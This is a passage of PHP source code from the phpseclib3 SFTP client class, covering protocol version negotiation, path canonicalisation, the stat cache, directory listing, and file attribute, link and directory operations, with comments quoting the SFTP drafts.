"exec sftp-server"; // we don't do $this->exec($command, false) because exec() operates on a different channel and plus the SSH_MSG_CHANNEL_OPEN that exec() does // is redundant $packet = Strings::packSSH2( 'CNsCs', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL], 'exec', 1, $command ); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL] = NET_SSH2_MSG_CHANNEL_REQUEST; $response = $this->get_channel_packet(self::CHANNEL, true); if ($response === false) { return false; } } elseif ($response === true && $this->isTimeout()) { return false; } $this->channel_status[self::CHANNEL] = NET_SSH2_MSG_CHANNEL_DATA; $this->send_sftp_packet(NET_SFTP_INIT, "\0\0\0\3"); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_VERSION) { throw new \UnexpectedValueException('Expected NET_SFTP_VERSION. ' . 'Got packet type: ' . $this->packet_type); } $this->use_request_id = true; list($this->defaultVersion) = Strings::unpackSSH2('N', $response); while (!empty($response)) { list($key, $value) = Strings::unpackSSH2('ss', $response); $this->extensions[$key] = $value; } $this->partial_init = true; return true; } /** * (Re)initializes the SFTP channel * * @return bool */ private function init_sftp_connection() { if (!$this->partial_init && !$this->partial_init_sftp_connection()) { return false; } /* A Note on SFTPv4/5/6 support: states the following: "If the client wishes to interoperate with servers that support noncontiguous version numbers it SHOULD send '3'" Given that the server only sends its version number after the client has already done so, the above seems to be suggesting that v3 should be the default version. This makes sense given that v3 is the most popular. states the following; "If the server did not send the "versions" extension, or the version-from-list was not included, the server MAY send a status response describing the failure, but MUST then close the channel without processing any further requests." So what do you do if you have a client whose initial SSH_FXP_INIT packet says it implements v3 and a server whose initial SSH_FXP_VERSION reply says it implements v4 and only v4? If it only implements v4, the "versions" extension is likely not going to have been sent so version re-negotiation as discussed in draft-ietf-secsh-filexfer-13 would be quite impossible. As such, what \phpseclib3\Net\SFTP would do is close the channel and reopen it with a new and updated SSH_FXP_INIT packet. */ $this->version = $this->defaultVersion; if (isset($this->extensions['versions']) && (!$this->preferredVersion || $this->preferredVersion != $this->version)) { $versions = explode(',', $this->extensions['versions']); $supported = [6, 5, 4]; if ($this->preferredVersion) { $supported = array_diff($supported, [$this->preferredVersion]); array_unshift($supported, $this->preferredVersion); } foreach ($supported as $ver) { if (in_array($ver, $versions)) { if ($ver === $this->version) { break; } $this->version = (int) $ver; $packet = Strings::packSSH2('ss', 'version-select', "$ver"); $this->send_sftp_packet(NET_SFTP_EXTENDED, $packet); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); throw new \UnexpectedValueException('Expected NET_SFTP_STATUS_OK. ' . ' Got ' . $status); } break; } } } /* SFTPv4+ defines a 'newline' extension. SFTPv3 seems to have unofficial support for it via 'newline@vandyke.com', however, I'm not sure what 'newline@vandyke.com' is supposed to do (the fact that it's unofficial means that it's not in the official SFTPv3 specs) and 'newline@vandyke.com' / 'newline' are likely not drop-in substitutes for one another due to the fact that 'newline' comes with a SSH_FXF_TEXT bitmask whereas it seems unlikely that 'newline@vandyke.com' would. */ /* if (isset($this->extensions['newline@vandyke.com'])) { $this->extensions['newline'] = $this->extensions['newline@vandyke.com']; unset($this->extensions['newline@vandyke.com']); } */ if ($this->version < 2 || $this->version > 6) { return false; } $this->pwd = true; try { $this->pwd = $this->realpath('.'); } catch (\UnexpectedValueException $e) { if (!$this->canonicalize_paths) { throw $e; } $this->canonicalize_paths = false; $this->reset_connection(NET_SSH2_DISCONNECT_CONNECTION_LOST); } $this->update_stat_cache($this->pwd, []); return true; } /** * Disable the stat cache * */ public function disableStatCache() { $this->use_stat_cache = false; } /** * Enable the stat cache * */ public function enableStatCache() { $this->use_stat_cache = true; } /** * Clear the stat cache * */ public function clearStatCache() { $this->stat_cache = []; } /** * Enable path canonicalization * */ public function enablePathCanonicalization() { $this->canonicalize_paths = true; } /** * Disable path canonicalization * * If this is enabled then $sftp->pwd() will not return the canonicalized absolute path * */ public function disablePathCanonicalization() { $this->canonicalize_paths = false; } /** * Enable arbitrary length packets * */ public function enableArbitraryLengthPackets() { $this->allow_arbitrary_length_packets = true; } /** * Disable arbitrary length packets * */ public function disableArbitraryLengthPackets() { $this->allow_arbitrary_length_packets = false; } /** * Returns the current directory name * * @return string|bool */ public function pwd() { if (!$this->precheck()) { return false; } return $this->pwd; } /** * Logs errors * * @param string $response * @param int $status */ private function logError($response, $status = -1) { if ($status == -1) { list($status) = Strings::unpackSSH2('N', $response); } $error = self::$status_codes[$status]; if ($this->version > 2) { list($message) = Strings::unpackSSH2('s', $response); $this->sftp_errors[] = "$error: $message"; } else { $this->sftp_errors[] = $error; } } /** * Canonicalize the Server-Side Path Name * * SFTP doesn't provide a mechanism by which the current working directory can be changed, so we'll emulate it. Returns * the absolute (canonicalized) path. * * If canonicalize_paths has been disabled using disablePathCanonicalization(), $path is returned as-is. * * @see self::chdir() * @see self::disablePathCanonicalization() * @param string $path * @throws \UnexpectedValueException on receipt of unexpected packets * @return mixed */ public function realpath($path) { if ($this->precheck() === false) { return false; } if (!$this->canonicalize_paths) { if ($this->pwd === true) { return '.'; } if (!strlen($path) || $path[0] != '/') { $path = $this->pwd . '/' . $path; } $parts = explode('/', $path); $afterPWD = $beforePWD = []; foreach ($parts as $part) { switch ($part) { //case '': // some SFTP servers /require/ double /'s. see https://github.com/phpseclib/phpseclib/pull/1137 case '.': break; case '..': if (!empty($afterPWD)) { array_pop($afterPWD); } else { $beforePWD[] = '..'; } break; default: $afterPWD[] = $part; } } $beforePWD = count($beforePWD) ? implode('/', $beforePWD) : '.'; return $beforePWD . '/' . implode('/', $afterPWD); } if ($this->pwd === true) { // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.9 $this->send_sftp_packet(NET_SFTP_REALPATH, Strings::packSSH2('s', $path)); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_NAME: // although SSH_FXP_NAME is implemented differently in SFTPv3 than it is in SFTPv4+, the following // should work on all SFTP versions since the only part of the SSH_FXP_NAME packet the following looks // at is the first part and that part is defined the same in SFTP versions 3 through 6. list(, $filename) = Strings::unpackSSH2('Ns', $response); return $filename; case NET_SFTP_STATUS: $this->logError($response); return false; default: throw new \UnexpectedValueException('Expected NET_SFTP_NAME or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } if (!strlen($path) || $path[0] != '/') { $path = $this->pwd . '/' . $path; } $path = explode('/', $path); $new = []; foreach ($path as $dir) { if (!strlen($dir)) { continue; } switch ($dir) { case '..': array_pop($new); // fall-through case '.': break; default: $new[] = $dir; } } return '/' . implode('/', $new); } /** * Changes the current directory * * @param string $dir * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ public function chdir($dir) { if (!$this->precheck()) { return false; } // assume current dir if $dir is empty if ($dir === '') { $dir = './'; // suffix a slash if needed } elseif ($dir[strlen($dir) - 1] != '/') { $dir .= '/'; } $dir = $this->realpath($dir); // confirm that $dir is, in fact, a valid directory if ($this->use_stat_cache && is_array($this->query_stat_cache($dir))) { $this->pwd = $dir; return true; } // we could do a stat on the alleged $dir to see if it's a directory but that doesn't tell us // the currently logged in user has the appropriate permissions or not. maybe you could see if // the file's uid / gid match the currently logged in user's uid / gid but how there's no easy // way to get those with SFTP $this->send_sftp_packet(NET_SFTP_OPENDIR, Strings::packSSH2('s', $dir)); // see \phpseclib3\Net\SFTP::nlist() for a more thorough explanation of the following $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: $handle = substr($response, 4); break; case NET_SFTP_STATUS: $this->logError($response); return false; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS' . 'Got packet type: ' . $this->packet_type); } if (!$this->close_handle($handle)) { return false; } $this->update_stat_cache($dir, []); $this->pwd = $dir; return true; } /** * Returns a list of files in the given directory * * @param string $dir * @param bool $recursive * @return array|false */ public function nlist($dir = '.', $recursive = false) { return $this->nlist_helper($dir, $recursive, ''); } /** * Helper method for nlist * * @param string $dir * @param bool $recursive * @param string $relativeDir * @return array|false */ private function nlist_helper($dir, $recursive, $relativeDir) { $files = $this->readlist($dir, false); // If we get an int back, then that is an "unexpected" status. // We do not have a file list, so return false. if (is_int($files)) { return false; } if (!$recursive || $files === false) { return $files; } $result = []; foreach ($files as $value) { if ($value == '.' || $value == '..') { $result[] = $relativeDir . $value; continue; } if (is_array($this->query_stat_cache($this->realpath($dir . '/' . $value)))) { $temp = $this->nlist_helper($dir . '/' . $value, true, $relativeDir . $value . '/'); $temp = is_array($temp) ? $temp : []; $result = array_merge($result, $temp); } else { $result[] = $relativeDir . $value; } } return $result; } /** * Returns a detailed list of files in the given directory * * @param string $dir * @param bool $recursive * @return array|false */ public function rawlist($dir = '.', $recursive = false) { $files = $this->readlist($dir, true); // If we get an int back, then that is an "unexpected" status. // We do not have a file list, so return false. if (is_int($files)) { return false; } if (!$recursive || $files === false) { return $files; } static $depth = 0; foreach ($files as $key => $value) { if ($depth != 0 && $key == '..') { unset($files[$key]); continue; } $is_directory = false; if ($key != '.' && $key != '..') { if ($this->use_stat_cache) { $is_directory = is_array($this->query_stat_cache($this->realpath($dir . '/' . $key))); } else { $stat = $this->lstat($dir . '/' . $key); $is_directory = $stat && $stat['type'] === NET_SFTP_TYPE_DIRECTORY; } } if ($is_directory) { $depth++; $files[$key] = $this->rawlist($dir . '/' . $key, true); $depth--; } else { $files[$key] = (object) $value; } } return $files; } /** * Reads a list, be it detailed or not, of files in the given directory * * @param string $dir * @param bool $raw * @return array|false * @throws \UnexpectedValueException on receipt of unexpected packets */ private function readlist($dir, $raw = true) { if (!$this->precheck()) { return false; } $dir = $this->realpath($dir . '/'); if ($dir === false) { return false; } // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.1.2 $this->send_sftp_packet(NET_SFTP_OPENDIR, Strings::packSSH2('s', $dir)); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-9.2 // since 'handle' is the last field in the SSH_FXP_HANDLE packet, we'll just remove the first four bytes that // represent the length of the string and leave it at that $handle = substr($response, 4); break; case NET_SFTP_STATUS: // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED list($status) = Strings::unpackSSH2('N', $response); $this->logError($response, $status); return $status; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } $this->update_stat_cache($dir, []); $contents = []; while (true) { // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.2.2 // why multiple SSH_FXP_READDIR packets would be sent when the response to a single one can span arbitrarily many // SSH_MSG_CHANNEL_DATA messages is not known to me. $this->send_sftp_packet(NET_SFTP_READDIR, Strings::packSSH2('s', $handle)); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_NAME: list($count) = Strings::unpackSSH2('N', $response); for ($i = 0; $i < $count; $i++) { list($shortname) = Strings::unpackSSH2('s', $response); // SFTPv4 "removed the long filename from the names structure-- it can now be // built from information available in the attrs structure." if ($this->version < 4) { list($longname) = Strings::unpackSSH2('s', $response); } $attributes = $this->parseAttributes($response); if (!isset($attributes['type']) && $this->version < 4) { $fileType = $this->parseLongname($longname); if ($fileType) { $attributes['type'] = $fileType; } } $contents[$shortname] = $attributes + ['filename' => $shortname]; if (isset($attributes['type']) && $attributes['type'] == NET_SFTP_TYPE_DIRECTORY && ($shortname != '.' && $shortname != '..')) { $this->update_stat_cache($dir . '/' . $shortname, []); } else { if ($shortname == '..') { $temp = $this->realpath($dir . '/..') . '/.'; } else { $temp = $dir . '/' . $shortname; } $this->update_stat_cache($temp, (object) ['lstat' => $attributes]); } // SFTPv6 has an optional boolean end-of-list field, but we'll ignore that, since the // final SSH_FXP_STATUS packet should tell us that, already. } break; case NET_SFTP_STATUS: list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_EOF) { $this->logError($response, $status); return $status; } break 2; default: throw new \UnexpectedValueException('Expected NET_SFTP_NAME or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } if (!$this->close_handle($handle)) { return false; } if (count($this->sortOptions)) { uasort($contents, [&$this, 'comparator']); } return $raw ? $contents : array_map('strval', array_keys($contents)); } /** * Compares two rawlist entries using parameters set by setListOrder() * * Intended for use with uasort() * * @param array $a * @param array $b * @return int */ private function comparator(array $a, array $b) { switch (true) { case $a['filename'] === '.' || $b['filename'] === '.': if ($a['filename'] === $b['filename']) { return 0; } return $a['filename'] === '.' ? -1 : 1; case $a['filename'] === '..' || $b['filename'] === '..': if ($a['filename'] === $b['filename']) { return 0; } return $a['filename'] === '..' ? -1 : 1; case isset($a['type']) && $a['type'] === NET_SFTP_TYPE_DIRECTORY: if (!isset($b['type'])) { return 1; } if ($b['type'] !== $a['type']) { return -1; } break; case isset($b['type']) && $b['type'] === NET_SFTP_TYPE_DIRECTORY: return 1; } foreach ($this->sortOptions as $sort => $order) { if (!isset($a[$sort]) || !isset($b[$sort])) { if (isset($a[$sort])) { return -1; } if (isset($b[$sort])) { return 1; } return 0; } switch ($sort) { case 'filename': $result = strcasecmp($a['filename'], $b['filename']); if ($result) { return $order === SORT_DESC ? -$result : $result; } break; case 'mode': $a[$sort] &= 07777; $b[$sort] &= 07777; // fall-through default: if ($a[$sort] === $b[$sort]) { break; } return $order === SORT_ASC ? $a[$sort] - $b[$sort] : $b[$sort] - $a[$sort]; } } } /** * Defines how nlist() and rawlist() will be sorted - if at all. * * If sorting is enabled directories and files will be sorted independently with * directories appearing before files in the resultant array that is returned. * * Any parameter returned by stat is a valid sort parameter for this function. * Filename comparisons are case insensitive. * * Examples: * * $sftp->setListOrder('filename', SORT_ASC); * $sftp->setListOrder('size', SORT_DESC, 'filename', SORT_ASC); * $sftp->setListOrder(true); * Separates directories from files but doesn't do any sorting beyond that * $sftp->setListOrder(); * Don't do any sort of sorting * * @param string ...$args */ public function setListOrder(...$args) { $this->sortOptions = []; if (empty($args)) { return; } $len = count($args) & 0x7FFFFFFE; for ($i = 0; $i < $len; $i += 2) { $this->sortOptions[$args[$i]] = $args[$i + 1]; } if (!count($this->sortOptions)) { $this->sortOptions = ['bogus' => true]; } } /** * Save files / directories to cache * * @param string $path * @param mixed $value */ private function update_stat_cache($path, $value) { if ($this->use_stat_cache === false) { return; } // preg_replace('#^/|/(?=/)|/$#', '', $dir) == str_replace('//', '/', trim($path, '/')) $dirs = explode('/', preg_replace('#^/|/(?=/)|/$#', '', $path)); $temp = &$this->stat_cache; $max = count($dirs) - 1; foreach ($dirs as $i => $dir) { // if $temp is an object that means one of two things. // 1. a file was deleted and changed to a directory behind phpseclib's back // 2. it's a symlink. when lstat is done it's unclear what it's a symlink to if (is_object($temp)) { $temp = []; } if (!isset($temp[$dir])) { $temp[$dir] = []; } if ($i === $max) { if (is_object($temp[$dir]) && is_object($value)) { if (!isset($value->stat) && isset($temp[$dir]->stat)) { $value->stat = $temp[$dir]->stat; } if (!isset($value->lstat) && isset($temp[$dir]->lstat)) { $value->lstat = $temp[$dir]->lstat; } } $temp[$dir] = $value; break; } $temp = &$temp[$dir]; } } /** * Remove files / directories from cache * * @param string $path * @return bool */ private function remove_from_stat_cache($path) { $dirs = explode('/', preg_replace('#^/|/(?=/)|/$#', '', $path)); $temp = &$this->stat_cache; $max = count($dirs) - 1; foreach ($dirs as $i => $dir) { if (!is_array($temp)) { return false; } if ($i === $max) { unset($temp[$dir]); return true; } if (!isset($temp[$dir])) { return false; } $temp = &$temp[$dir]; } } /** * Checks cache for path * * Mainly used by file_exists * * @param string $path * @return mixed */ private function query_stat_cache($path) { $dirs = explode('/', preg_replace('#^/|/(?=/)|/$#', '', $path)); $temp = &$this->stat_cache; foreach ($dirs as $dir) { if (!is_array($temp)) { return null; } if (!isset($temp[$dir])) { return null; } $temp = &$temp[$dir]; } return $temp; } /** * Returns general information about a file. * * Returns an array on success and false otherwise. * * @param string $filename * @return array|false */ public function stat($filename) { if (!$this->precheck()) { return false; } $filename = $this->realpath($filename); if ($filename === false) { return false; } if ($this->use_stat_cache) { $result = $this->query_stat_cache($filename); if (is_array($result) && isset($result['.']) && isset($result['.']->stat)) { return $result['.']->stat; } if (is_object($result) && isset($result->stat)) { return $result->stat; } } $stat = $this->stat_helper($filename, NET_SFTP_STAT); if ($stat === false) { $this->remove_from_stat_cache($filename); return false; } if (isset($stat['type'])) { if ($stat['type'] == NET_SFTP_TYPE_DIRECTORY) { $filename .= '/.'; } $this->update_stat_cache($filename, (object) ['stat' => $stat]); return $stat; } $pwd = $this->pwd; $stat['type'] = $this->chdir($filename) ? NET_SFTP_TYPE_DIRECTORY : NET_SFTP_TYPE_REGULAR; $this->pwd = $pwd; if ($stat['type'] == NET_SFTP_TYPE_DIRECTORY) { $filename .= '/.'; } $this->update_stat_cache($filename, (object) ['stat' => $stat]); return $stat; } /** * Returns general information about a file or symbolic link. * * Returns an array on success and false otherwise. * * @param string $filename * @return array|false */ public function lstat($filename) { if (!$this->precheck()) { return false; } $filename = $this->realpath($filename); if ($filename === false) { return false; } if ($this->use_stat_cache) { $result = $this->query_stat_cache($filename); if (is_array($result) && isset($result['.']) && isset($result['.']->lstat)) { return $result['.']->lstat; } if (is_object($result) && isset($result->lstat)) { return $result->lstat; } } $lstat = $this->stat_helper($filename, NET_SFTP_LSTAT); if ($lstat === false) { $this->remove_from_stat_cache($filename); return false; } if (isset($lstat['type'])) { if ($lstat['type'] == NET_SFTP_TYPE_DIRECTORY) { $filename .= '/.'; } $this->update_stat_cache($filename, (object) ['lstat' => $lstat]); return $lstat; } $stat = $this->stat_helper($filename, NET_SFTP_STAT); if ($lstat != $stat) { $lstat = array_merge($lstat, ['type' => NET_SFTP_TYPE_SYMLINK]); $this->update_stat_cache($filename, (object) ['lstat' => $lstat]); return $stat; } $pwd = $this->pwd; $lstat['type'] = $this->chdir($filename) ? NET_SFTP_TYPE_DIRECTORY : NET_SFTP_TYPE_REGULAR; $this->pwd = $pwd; if ($lstat['type'] == NET_SFTP_TYPE_DIRECTORY) { $filename .= '/.'; } $this->update_stat_cache($filename, (object) ['lstat' => $lstat]); return $lstat; } /** * Returns general information about a file or symbolic link * * Determines information without calling \phpseclib3\Net\SFTP::realpath(). * The second parameter can be either NET_SFTP_STAT or NET_SFTP_LSTAT. * * @param string $filename * @param int $type * @throws \UnexpectedValueException on receipt of unexpected packets * @return array|false */ private function stat_helper($filename, $type) { // SFTPv4+ adds an additional 32-bit integer field - flags - to the following: $packet = Strings::packSSH2('s', $filename); $this->send_sftp_packet($type, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_ATTRS: return $this->parseAttributes($response); case NET_SFTP_STATUS: $this->logError($response); return false; } throw new \UnexpectedValueException('Expected NET_SFTP_ATTRS or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } /** * Truncates a file to a given length * * @param string $filename * @param int $new_size * @return bool */ public function truncate($filename, $new_size) { $attr = Strings::packSSH2('NQ', NET_SFTP_ATTR_SIZE, $new_size); return $this->setstat($filename, $attr, false); } /** * Sets access and modification time of file. * * If the file does not exist, it will be created. * * @param string $filename * @param int $time * @param int $atime * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ public function touch($filename, $time = null, $atime = null) { if (!$this->precheck()) { return false; } $filename = $this->realpath($filename); if ($filename === false) { return false; } if (!isset($time)) { $time = time(); } if (!isset($atime)) { $atime = $time; } $attr = $this->version < 4 ? pack('N3', NET_SFTP_ATTR_ACCESSTIME, $atime, $time) : Strings::packSSH2('NQ2', NET_SFTP_ATTR_ACCESSTIME | NET_SFTP_ATTR_MODIFYTIME, $atime, $time); $packet = Strings::packSSH2('s', $filename); $packet .= $this->version >= 5 ? pack('N2', 0, NET_SFTP_OPEN_OPEN_EXISTING) : pack('N', NET_SFTP_OPEN_WRITE | NET_SFTP_OPEN_CREATE | NET_SFTP_OPEN_EXCL); $packet .= $attr; $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: return $this->close_handle(substr($response, 4)); case NET_SFTP_STATUS: $this->logError($response); break; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } return $this->setstat($filename, $attr, false); } /** * Changes file or directory owner * * $uid should be an int for SFTPv3 and a string for SFTPv4+. Ideally the string * would be of the form "user@dns_domain" but it does not need to be. * `$sftp->getSupportedVersions()['version']` will return the specific version * that's being used. * * Returns true on success or false on error. * * @param string $filename * @param int|string $uid * @param bool $recursive * @return bool */ public function chown($filename, $uid, $recursive = false) { /* quoting , "To avoid a representation that is tied to a particular underlying implementation at the client or server, the use of UTF-8 strings has been chosen. The string should be of the form "user@dns_domain". This will allow for a client and server that do not use the same local representation the ability to translate to a common syntax that can be interpreted by both. In the case where there is no translation available to the client or server, the attribute value must be constructed without the "@"." phpseclib _could_ auto append the dns_domain to $uid BUT what if it shouldn't have one? phpseclib would have no way of knowing so rather than guess phpseclib will just use whatever value the user provided */ $attr = $this->version < 4 ? // quoting , // "if the owner or group is specified as -1, then that ID is not changed" pack('N3', NET_SFTP_ATTR_UIDGID, $uid, -1) : // quoting , // "If either the owner or group field is zero length, the field should be // considered absent, and no change should be made to that specific field // during a modification operation" Strings::packSSH2('Nss', NET_SFTP_ATTR_OWNERGROUP, $uid, ''); return $this->setstat($filename, $attr, $recursive); } /** * Changes file or directory group * * $gid should be an int for SFTPv3 and a string for SFTPv4+. Ideally the string * would be of the form "user@dns_domain" but it does not need to be. * `$sftp->getSupportedVersions()['version']` will return the specific version * that's being used. * * Returns true on success or false on error. * * @param string $filename * @param int|string $gid * @param bool $recursive * @return bool */ public function chgrp($filename, $gid, $recursive = false) { $attr = $this->version < 4 ? pack('N3', NET_SFTP_ATTR_UIDGID, -1, $gid) : Strings::packSSH2('Nss', NET_SFTP_ATTR_OWNERGROUP, '', $gid); return $this->setstat($filename, $attr, $recursive); } /** * Set permissions on a file. * * Returns the new file permissions on success or false on error. * If $recursive is true than this just returns true or false. * * @param int $mode * @param string $filename * @param bool $recursive * @throws \UnexpectedValueException on receipt of unexpected packets * @return mixed */ public function chmod($mode, $filename, $recursive = false) { if (is_string($mode) && is_int($filename)) { $temp = $mode; $mode = $filename; $filename = $temp; } $attr = pack('N2', NET_SFTP_ATTR_PERMISSIONS, $mode & 07777); if (!$this->setstat($filename, $attr, $recursive)) { return false; } if ($recursive) { return true; } $filename = $this->realpath($filename); // rather than return what the permissions *should* be, we'll return what they actually are. this will also // tell us if the file actually exists. // incidentally, SFTPv4+ adds an additional 32-bit integer field - flags - to the following: $packet = pack('Na*', strlen($filename), $filename); $this->send_sftp_packet(NET_SFTP_STAT, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_ATTRS: $attrs = $this->parseAttributes($response); return $attrs['mode']; case NET_SFTP_STATUS: $this->logError($response); return false; } throw new \UnexpectedValueException('Expected NET_SFTP_ATTRS or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } /** * Sets information about a file * * @param string $filename * @param string $attr * @param bool $recursive * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ private function setstat($filename, $attr, $recursive) { if (!$this->precheck()) { return false; } $filename = $this->realpath($filename); if ($filename === false) { return false; } $this->remove_from_stat_cache($filename); if ($recursive) { $i = 0; $result = $this->setstat_recursive($filename, $attr, $i); $this->read_put_responses($i); return $result; } $packet = Strings::packSSH2('s', $filename); $packet .= $this->version >= 4 ? pack('a*Ca*', substr($attr, 0, 4), NET_SFTP_TYPE_UNKNOWN, substr($attr, 4)) : $attr; $this->send_sftp_packet(NET_SFTP_SETSTAT, $packet); /* "Because some systems must use separate system calls to set various attributes, it is possible that a failure response will be returned, but yet some of the attributes may be have been successfully modified. If possible, servers SHOULD avoid this situation; however, clients MUST be aware that this is possible." -- http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.6 */ $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return false; } return true; } /** * Recursively sets information on directories on the SFTP server * * Minimizes directory lookups and SSH_FXP_STATUS requests for speed. * * @param string $path * @param string $attr * @param int $i * @return bool */ private function setstat_recursive($path, $attr, &$i) { if (!$this->read_put_responses($i)) { return false; } $i = 0; $entries = $this->readlist($path, true); if ($entries === false || is_int($entries)) { return $this->setstat($path, $attr, false); } // normally $entries would have at least . and .. but it might not if the directories // permissions didn't allow reading if (empty($entries)) { return false; } unset($entries['.'], $entries['..']); foreach ($entries as $filename => $props) { if (!isset($props['type'])) { return false; } $temp = $path . '/' . $filename; if ($props['type'] == NET_SFTP_TYPE_DIRECTORY) { if (!$this->setstat_recursive($temp, $attr, $i)) { return false; } } else { $packet = Strings::packSSH2('s', $temp); $packet .= $this->version >= 4 ? pack('Ca*', NET_SFTP_TYPE_UNKNOWN, $attr) : $attr; $this->send_sftp_packet(NET_SFTP_SETSTAT, $packet); $i++; if ($i >= NET_SFTP_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { return false; } $i = 0; } } } $packet = Strings::packSSH2('s', $path); $packet .= $this->version >= 4 ? pack('Ca*', NET_SFTP_TYPE_UNKNOWN, $attr) : $attr; $this->send_sftp_packet(NET_SFTP_SETSTAT, $packet); $i++; if ($i >= NET_SFTP_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { return false; } $i = 0; } return true; } /** * Return the target of a symbolic link * * @param string $link * @throws \UnexpectedValueException on receipt of unexpected packets * @return mixed */ public function readlink($link) { if (!$this->precheck()) { return false; } $link = $this->realpath($link); $this->send_sftp_packet(NET_SFTP_READLINK, Strings::packSSH2('s', $link)); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_NAME: break; case NET_SFTP_STATUS: $this->logError($response); return false; default: throw new \UnexpectedValueException('Expected NET_SFTP_NAME or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($count) = Strings::unpackSSH2('N', $response); // the file isn't a symlink if (!$count) { return false; } list($filename) = Strings::unpackSSH2('s', $response); return $filename; } /** * Create a symlink * * symlink() creates a symbolic link to the existing target with the specified name link. * * @param string $target * @param string $link * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ public function symlink($target, $link) { if (!$this->precheck()) { return false; } //$target = $this->realpath($target); $link = $this->realpath($link); /* quoting https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-09#section-12.1 : Changed the SYMLINK packet to be LINK and give it the ability to create hard links. Also change it's packet number because many implementation implemented SYMLINK with the arguments reversed. Hopefully the new argument names make it clear which way is which. */ if ($this->version == 6) { $type = NET_SFTP_LINK; $packet = Strings::packSSH2('ssC', $link, $target, 1); } else { $type = NET_SFTP_SYMLINK; /* quoting http://bxr.su/OpenBSD/usr.bin/ssh/PROTOCOL#347 : 3.1. sftp: Reversal of arguments to SSH_FXP_SYMLINK When OpenSSH's sftp-server was implemented, the order of the arguments to the SSH_FXP_SYMLINK method was inadvertently reversed. Unfortunately, the reversal was not noticed until the server was widely deployed. Since fixing this to follow the specification would cause incompatibility, the current order was retained. For correct operation, clients should send SSH_FXP_SYMLINK as follows: uint32 id string targetpath string linkpath */ $packet = substr($this->server_identifier, 0, 15) == 'SSH-2.0-OpenSSH' ? Strings::packSSH2('ss', $target, $link) : Strings::packSSH2('ss', $link, $target); } $this->send_sftp_packet($type, $packet); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return false; } return true; } /** * Creates a directory. * * @param string $dir * @param int $mode * @param bool $recursive * @return bool */ public function mkdir($dir, $mode = -1, $recursive = false) { if (!$this->precheck()) { return false; } $dir = $this->realpath($dir); if ($recursive) { $dirs = explode('/', preg_replace('#/(?=/)|/$#', '', $dir)); if (empty($dirs[0])) { array_shift($dirs); $dirs[0] = '/' . $dirs[0]; } for ($i = 0; $i < count($dirs); $i++) { $temp = array_slice($dirs, 0, $i + 1); $temp = implode('/', $temp); $result = $this->mkdir_helper($temp, $mode); } return $result; } return $this->mkdir_helper($dir, $mode); } /** * Helper function for directory creation * * @param string $dir * @param int $mode * @return bool */ private function mkdir_helper($dir, $mode) { // send SSH_FXP_MKDIR without any attributes (that's what the \0\0\0\0 is doing) $this->send_sftp_packet(NET_SFTP_MKDIR, Strings::packSSH2('s', $dir) . "\0\0\0\0"); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return false; } if ($mode !== -1) { $this->chmod($mode, $dir); } return true; } /** * Removes a directory. * * @param string $dir * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ public function rmdir($dir) { if (!$this->precheck()) { return false; } $dir = $this->realpath($dir); if ($dir === false) { return false; } $this->send_sftp_packet(NET_SFTP_RMDIR, 